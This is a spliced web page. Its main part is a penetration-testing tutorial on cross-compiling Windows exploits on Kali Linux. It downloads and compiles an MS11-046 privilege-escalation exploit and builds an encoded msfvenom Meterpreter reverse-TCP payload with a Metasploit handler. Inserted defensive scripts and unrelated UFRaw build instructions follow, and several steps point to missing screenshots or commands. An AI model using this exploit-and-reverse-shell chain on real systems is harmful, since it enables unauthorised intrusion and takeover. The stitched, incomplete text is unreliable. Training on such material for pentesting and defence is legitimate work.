I586 Mingw32msvc Gcc For Mac
Microsoft Windows still holds the largest market share when it comes to operating systems for desktop computers, both for enterprise use and personal use. Therefore it is highly likely you will encounter a lot of Windows workstations and servers during your penetration testing training and career. On the other hand, most penetration testers mainly use Linux-based distributions such as Kali Linux, Pentoo or Backbox. Therefore you need the ability to quickly compile Windows exploits on your Linux machine. The solution for this is: Mingw-w64.
Mingw-w64 is a free and open source software development environment for creating Windows applications. Mingw-w64 was originally called Mingw32, which didn’t support the 64 bit architecture. In this tutorial we will be looking at how to use Mingw-w64 to compile exploits for Windows on Kali Linux. Let’s start with installing Mingw-w64 on Kali Linux.
For the MSYS environment you should install the packages msys, mingw-runtime, w32api, binutils and gcc from the MinGW site. Cygwin can be installed by downloading and running the installation program setup.exe. The pre-built versions will only work with MINGW or Cygwin. Note that the version you download must match that of the MINGW compiler, i586-mingw32msvc-gcc, which you can verify by typing 'i586-mingw32msvc-gcc -ver'.
Installing Mingw-w64 on Kali Linux
Mingw-w64 is not installed by default on Kali Linux 2016.2 and earlier versions. Therefore we need to install it first before we can compile Windows exploits on Linux. Run the following commands to install Mingw-w64:
apt-get update
apt-get install mingw-w64
Use apt-get install mingw-w64 to install Mingw-w64 on your Kali host.
Type y for yes to confirm and continue the Mingw-w64 installation process. Downloading and installing Mingw-w64 may take a little while to complete.
Unable to locate package mingw-w64
Sometimes you get an "Unable to locate package mingw-w64" error when trying to install the mingw-w64 package, with output like:
root@kali:~# apt-get install mingw-w64
Reading package lists… Done
Building dependency tree
Reading state information… Done
E: Unable to locate package mingw-w64
To solve this issue make sure you have the right repositories in the sources.list file. You can edit the file using nano:
/etc/apt/sources.list
Make sure you have the correct repositories in this file. You can find the repositories for different versions of Kali Linux on the following page:
With the right repositories in the sources.list file you need to run apt-get update and then run the installation command for the Mingw-w64 package again.
Cross compiling Windows exploits with Mingw-w64
Now that we have Mingw-w64 installed we can start to compile Windows exploits on Kali Linux. For this tutorial we will be compiling a Windows exploit written in C that exploits the CVE-2011-1249 (MS11-046) vulnerability in Windows 7 SP0 x86. This version of the Windows operating system contains a vulnerability in the Ancillary Function Driver (AFD) which allows an elevation of privilege for an authenticated non-administrative user. Even though Mingw-w64 was developed for the much needed 64 bit support, we can also compile 32 bit Windows exploits. Let’s have a look at how we can compile 32 bit Windows exploits.
Let’s start with downloading the exploit from Exploit-db:
wget --output-document=40564.c https://www.exploit-db.com/download/40564
Use the following command to compile the afd.sys exploit for Windows 32 bit:
i686-w64-mingw32-gcc [input file: source] -o [output file: .exe] -lws2_32
The following command will compile the Windows 7 afd.sys privilege escalation exploit:
i686-w64-mingw32-gcc 40564.c -o exploit.exe -lws2_32
To transfer the exploit to the target host we will be serving it with the built-in Apache webserver. The last 2 commands will copy the exploit to the Apache home directory and start the Apache webserver.
When we download and execute the exploit from cmd.exe it will look like this:
The exploit executed successfully.
As we can see, the whoami command returns a privileged user before executing the exploit and the system user after. This exploit actually spawns a new shell in the current shell where it was launched from instead of a new shell in a new window. This means we can also run this exploit from a command line shell, such as Meterpreter. Let’s see how we can run the exploit from a Meterpreter session.
Exploit compilation errors
When compiling exploits for different architectures and operating systems many errors can occur. There are a lot of variables which can cause the compilation to fail, such as: syntax, libraries, host and target architectures, installed software used for compiling code and a lot more. Some errors may be easy to fix and some are not. It is also important to distinguish warnings from fatal errors, since warnings may just indicate something like deprecated functions, which do not prevent the exploit from working. Fatal errors do prevent the exploit from working and therefore need to be fixed.
The best way to deal with compilation errors is to read them carefully and then search Google for solutions. Often you’re not the first and only person facing a certain compilation error and therefore it is not necessary to reinvent the wheel. Online resources such as Stack Exchange often provide you with possible solutions for the most common compilation errors.
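As an added example (not part of the original tutorial), the shell function below separates warnings from compile and link errors in a MinGW build log and points at a missing -lws2_32 when Winsock symbols are left unresolved. The log text and the file name client.c are constructed for illustration.

```sh
#!/bin/sh
# Added example: triage a MinGW/GCC build log read from stdin.
# Warnings are counted but do not fail the build; compile and link errors do.

# Constructed sample log for a hypothetical client.c built without -lws2_32.
sample_log() {
cat <<'EOF'
client.c: In function 'main':
client.c:14:9: warning: unused variable 'len' [-Wunused-variable]
client.c:22:17: warning: comparison of integer expressions of different signedness [-Wsign-compare]
/usr/bin/i686-w64-mingw32-ld: /tmp/ccA1b2C3.o:client.c:(.text+0x2f): undefined reference to `_imp__WSAStartup@8'
/usr/bin/i686-w64-mingw32-ld: /tmp/ccA1b2C3.o:client.c:(.text+0x5c): undefined reference to `_imp__socket@12'
collect2: error: ld returned 1 exit status
EOF
}

# Prints one summary line: counts, a pass/fail verdict and a linker hint.
triage() {
  awk '
    /^collect2: /            { next }           # linker summary, not a new error
    /: warning: /            { warn++; next }
    /: (fatal )?error: /     { err++;  next }
    /undefined reference to/ {
      link++
      # Unresolved Winsock symbols point at a missing -lws2_32.
      if ($0 ~ /reference to .(_imp__|__imp_)?(WSA[A-Za-z]+|socket|connect|send|recv|closesocket)[^A-Za-z0-9_]/)
        ws = 1
      next
    }
    END {
      verdict = (err + link > 0) ? "fail" : "ok"
      hint = ws ? "-lws2_32" : "none"
      printf "warnings=%d errors=%d link_errors=%d verdict=%s hint=%s\n", warn, err, link, verdict, hint
    }'
}

sample_log | triage
```

In practice the log would come from the compiler itself, for example by piping its stderr into triage.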
Exploit MS11-046 from a Meterpreter shell
Let’s quickly generate a Windows 32-bit Meterpreter reverse TCP payload using Msfvenom and execute it on the target host. We will be using the multi handler in Metasploit to catch the reverse shell.
Use the following command to create the payload using Msfvenom:
msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=[IP attackbox] LPORT=4444 -e x86/shikata_ga_nai -f exe -o exploit.exe
Be sure to replace the listening host IP and if necessary the listening port. Now start msfconsole and run the following commands to set up the multi handler exploit:
use exploit/multi/handler
set lhost [listening host IP]
set lport 4444
run
Then download the exploit to the target host and execute it. If everything was set up correctly you should receive a reverse Meterpreter shell on the msfconsole:
The target host connects back to the Kali box.
Next type shell on the Meterpreter command line and run the privilege escalation exploit to escalate the shell to a system shell:
The privilege escalation exploit executed successfully through our Meterpreter sessions.
As you can see, the shell goes from the privileged test user shell to a system shell. Please note that a new system shell is spawned in the shell where it was executed from. Therefore we cannot see the exploit output as it is in the old shell with limited privileges.
You can verify this by typing Exit which will exit the system shell and return you to the user shell which still contains the Windows 7 privilege escalation exploit output:
Lessons learned
In this tutorial we have learned the basics of cross compiling exploits for Windows on Linux. We have learned how to install Mingw-w64 on Kali Linux and solve the most common installation problems. To practice the exploit compilation process we have compiled a privilege escalation exploit targeted for Windows 7 x86. This is also called cross compiling.
We have successfully executed the compiled executable on the target host and escalated the shell from a limited user shell to a system shell. We have learned that this particular exploit spawned a shell inside the shell where the exploit was executed from. This way we can also execute the privilege escalation exploit from a command line such as a Meterpreter shell. Last but not least we have learned how to fix errors during the compilation process. As an ethical hacker and penetration tester it is advised to consult resources like Stack Exchange to search for solutions for compilation errors.
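From the defender's side, the escalation described above leaves a SYSTEM shell whose parent process was started by an ordinary user. The following added example (not part of the original tutorial) flags that parent/child mismatch; the CSV record layout and the sample events are constructed assumptions, not a real log format.

```sh
#!/bin/sh
# Added example: flag SYSTEM processes whose parent ran as an ordinary user.
# Assumed input: CSV process-creation records "time,pid,ppid,user,image"
# (a hypothetical export format), oldest record first.

# Constructed sample events.
sample_events() {
cat <<'EOF'
2024-01-01T10:00:02,512,4,NT AUTHORITY\SYSTEM,C:\Windows\System32\services.exe
2024-01-01T10:00:03,900,512,NT AUTHORITY\SYSTEM,C:\Windows\System32\svchost.exe
2024-01-01T10:05:10,2100,1800,WIN7\test,C:\Windows\System32\cmd.exe
2024-01-01T10:05:40,2244,2100,WIN7\test,C:\Users\test\Downloads\exploit.exe
2024-01-01T10:05:41,2300,2244,NT AUTHORITY\SYSTEM,C:\Windows\System32\cmd.exe
EOF
}

# Reads records on stdin and prints one ALERT line per suspicious child.
detect_system_children() {
  awk -F, '
    NF < 5 { next }                              # skip malformed records
    {
      is_system = (toupper($4) == "NT AUTHORITY\\SYSTEM")
      # Alert only when the parent is known and was not SYSTEM itself.
      if (is_system && ($3 in user) && toupper(user[$3]) != "NT AUTHORITY\\SYSTEM")
        printf "ALERT pid=%s user=%s image=%s parent_pid=%s parent_user=%s\n", $2, $4, $5, $3, user[$3]
      user[$2] = $4                              # remember who owns this pid
    }'
}

sample_events | detect_system_children
```

Services and scheduled tasks that legitimately run as SYSTEM are started by parents that are themselves SYSTEM, so they do not match this rule.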
Download and install
To use the UFRaw Gimp plug-in you need first to install Gimp 2.0 or higher. Gimp 2.4 is recommended. If you only plan to use UFRaw's stand-alone tool, there is no need to install Gimp, but the Gimp Tool Kit (GTK+2) is still needed. There is no need to install DCRaw itself since its code is incorporated into UFRaw.
Linux and other Unix compatible systems
There are UFRaw packages for several distributions:
- Debian.
- Ubuntu official packages, or more up-to-date PPA.
- Gentoo.
- Fedora.
- openSUSE.
- Alt Linux.
- archlinux.
- Italian Slackware Community.
- open mamba.
- FreeBSD Fresh Ports.
- OpenBSD (See packages faq).
- NetBSD Packages Collection.
- Darwin ports for Mac OS X.
- Mac ports for Mac OS X. (See guide and use sudo port install ufraw)
- Nexeta OS.
- T2.
- rPath rBuilder.
- Cygwin - Cygwin ports.
Let me know if I missed something or if this list is not up to date. Other UFRaw RPM packages for Mandriva, Fedora, openSUSE and ALTLinux can be found at RPM pbone.net or RPM Find.
It sometimes takes time until these packages are updated. If you want the latest and greatest version of UFRaw you might have to build it yourself.
To build UFRaw yourself you can either read the detailed instructions below or just download it and get the shorter version in the README file.
I'm using Debian GNU/Linux on a Pentium machine, but UFRaw can be built on different Unix flavors and many different architectures. Let me know if your system is not supported for some reason.
The following development packages are relevant for building UFRaw:
- The Gimp Tool Kit, GTK+2 (libgtk2.0>=2.6).
- For color management you need Little CMS (liblcms>=1.13).
- To build the Gimp plug-in you need Gimp (gimp>=2.0).
- To build the Cinepaint plug-in you need Cinepaint (cinepaint>=0.22).
- libtiff is required to create TIFF images.
- libjpeg is required to create JPEG images.
- libpng is required to create PNG images.
- libcfitsio3 is required to create FITS images.
- Exiv2 is required for EXIF support (does not support all camera models) (libexiv2>=0.11).
- To read gzipped raw files you need zlib.
- To read bzipped raw files you need libbz2.
- To be able to scroll the preview window you need GtkImageView (libgtkimageview>=1.3).
- lensfun is required to apply lens correction. This option is experimental. Enable with ./configure --with-lensfun. Read this before using it.
Only gtk+2.0 and liblcms are required. The others are optional; their relevant features will be enabled if they are found during configuration. In Debian you can get these packages with the command (requires root privilege):
apt-get install libgtk2.0-dev liblcms-dev libgimp2.0-dev libtiff-dev libjpeg62-dev libpng12-dev libexiv2-dev zlib1g-dev libbz2-dev libgtkimageview-dev
The libgtkimageview-dev package only exists in Debian testing and unstable. For cinepaint 0.22 there is no Debian package at the moment.
Now, you can download the UFRaw tarball ufraw-0.22.tar.gz, extract the files from it and enter the ufraw-0.22 directory:
Next, you should run the configuration script:
You will get a long output and at the end there will be a summary that should look approximately like:
There are also UFRaw specific flags for configure:
--enable-mime - install mime files, see README for more information
--enable-extras - build extra (dcraw, nikon-curve) executables
--enable-dst-correction - enable DST correction for file timestamps.
--enable-contrast - enable the contrast setting option.
--enable-interp-none - enable 'None' interpolation (mostly for debugging).
--with-lensfun - use the lensfun library - experimental feature, read this before using it.
--with-prefix=PREFIX - use also PREFIX as an input prefix for the build
--with-dosprefix=PREFIX - PREFIX is the prefix in dos format (needed only for ms-windows)
Next, you should build UFRaw by typing the command:
make
For installing the UFRaw Gimp plug-in, you have two options. You can install it only for the current user, which does not require root privileges, but only the current user will see the plug-in
gimp-tool --install-bin ufraw-gimp
or you can make a system wide installation (requires root privileges)
make install
This will also install the stand-alone tools ufraw, ufraw-batch and some related files (man page, icon and desktop definitions).
Macintosh
One option is to use the UFRaw package from Darwin ports or Mac ports.
If you use the GIMP on OS X application bundle, then the UFRaw plug-in is already bundled with Gimp. As far as I know the stand-alone version of UFRaw is not included.
Another option is the point & click installer for the UFRaw-0.9.1 GIMP plug-in. It was designed for the GimpShop, but might also work with the standard Gimp.
A more recent option is this native Mac OS X version of UFRaw
Mac OS X is in principle just another Unix flavor based on FreeBSD. I have no experience working with the Mac, but it was reported to me that UFRaw can be built on Mac OS X using the Fink package manager. Just follow the Unix instructions, where your configuration command should look like
./configure --prefix=/sw --with-prefix=/sw
MS-Windows
For MS-Windows users I have two installation versions. The 'for dummies' version where you only need to download and run an installer and the 'for geeks' version if you want to build the plug-in yourself.
I'm not a big fan of this operating system, so why does it get such special attention? UFRaw is a free software (as in free speech, not as in free beer). In this spirit I try to give the users the freedom to use it in any environment, even in environments like MS-Windows that try to take your freedom away by imposing proprietary standards on you. You are encouraged to use other free software like Gimp for editing your images, Firefox for surfing the net (in fact Firefox renders this page better), and LibreOffice for an office suite.
Another reason is that building UFRaw on MS-Windows is a bit tricky and not very convenient (did I say already that I don't like this operating system). I actually create the MS version of UFRaw in a Linux environment, but I guess that most of the users of the MS version don't have access to Linux, otherwise they would not need the MS version.
MS-Windows for dummies
UFRaw is now a stand-alone application (it used to depend on Gimp). You just need to download and run this.
The upside of UFRaw being a stand-alone installation is that it should work more reliably, without the DLL issues that many users had.
One downside is that the installer is much bigger (9MB) and requires much more disk space (53MB).
Another downside is that there is no GIMP plug-in. You only get the stand-alone version of UFRaw. A plug-in executable (ufraw-gimp.exe) is included, but it does not function. It will not work with GIMP-2.8. There might be a way to get it to work with GIMP-2.6, but I did not try.
MS-Windows for geeks
I build UFRaw using a cross-compiler in Linux. It is also possible to build UFRaw in the Cygwin environment, which imitates the Unix environment on MS-Windows. After setting up the environment and installing all the required packages the installation procedure is the same as for Unix. If you want to compile UFRaw in another environment or with a different compiler then you are on your own.
I use the Debian package mingw32 for cross compiling.
For the MSYS environment you should install the packages msys, mingw-runtime, w32api, binutils and gcc from the MinGW site.
Cygwin can be installed by downloading and running the installation program setup.exe. In addition to the default packages installed, you will also need the following packages, which you can find in the Devel category in the setup:
- gcc: C compiler
- make: The GNU version of the 'make' utility
- pkgconfig: A utility used to retrieve information about installed libraries
You can build a native Cygwin binary of UFRaw using the development packages from Cygwin ports, or you can use Cygwin to cross build a MinGW32 binary.
You will need the following development packages:
- gimp-dev (at least version 2.2)
- gtk+-dev (at least version 2.6)
- glib-dev
- pango-dev
- atk
- gettext
- libiconvi
- liblcms (at least version 1.13)
- libjpeg
- libtiff
- libpng
- zlib
- libbz2
- exiv2 (at least version 0.11)
- gtkimageview (at least version 1.3)
Most packages can be downloaded from Tor Lillqvist Gimp Windows port or from the GnuWin32 project. The Gimp development package is here. Other packages you might have to build yourself.
Extract all these files under one directory, for example c:\mingw32. In Linux I use the directory /opt/mingw32. Notice that all these libraries are not for Cygwin but for MinGW32. This is because they are used to cross build UFRaw on MinGW32.
pkg-config behaves differently under MinGW32. Therefore, if you are cross compiling, you will have to modify all the *.pc files that come with the different packages. The following script should do the trick (after updating TARGET to your needs):
At this point you should start following the installation instructions for Unix users. In Debian you will need the following configuration command:
./configure --with-prefix=/opt/mingw32 --with-dosprefix=z:optmingw32 --host=i586-mingw32msvc --target=i586-mingw32msvc --build=i386-linux
In Cygwin you will need the following configuration command:
./configure -with-prefix=/cygdrive/c/mingw32 --with-dosprefix=c:mingw32 --host=i686-mingw32msvc --target=i686-mingw32msvc --build=i686-cygwin
The window installer is created using Inno Setup, therefore if you want to create a UFRaw-installer you should install Inno Setup first. If you are cross-compiling ufraw on linux, you will need Wine. This will allow you to make windows-installer or to make install-windows.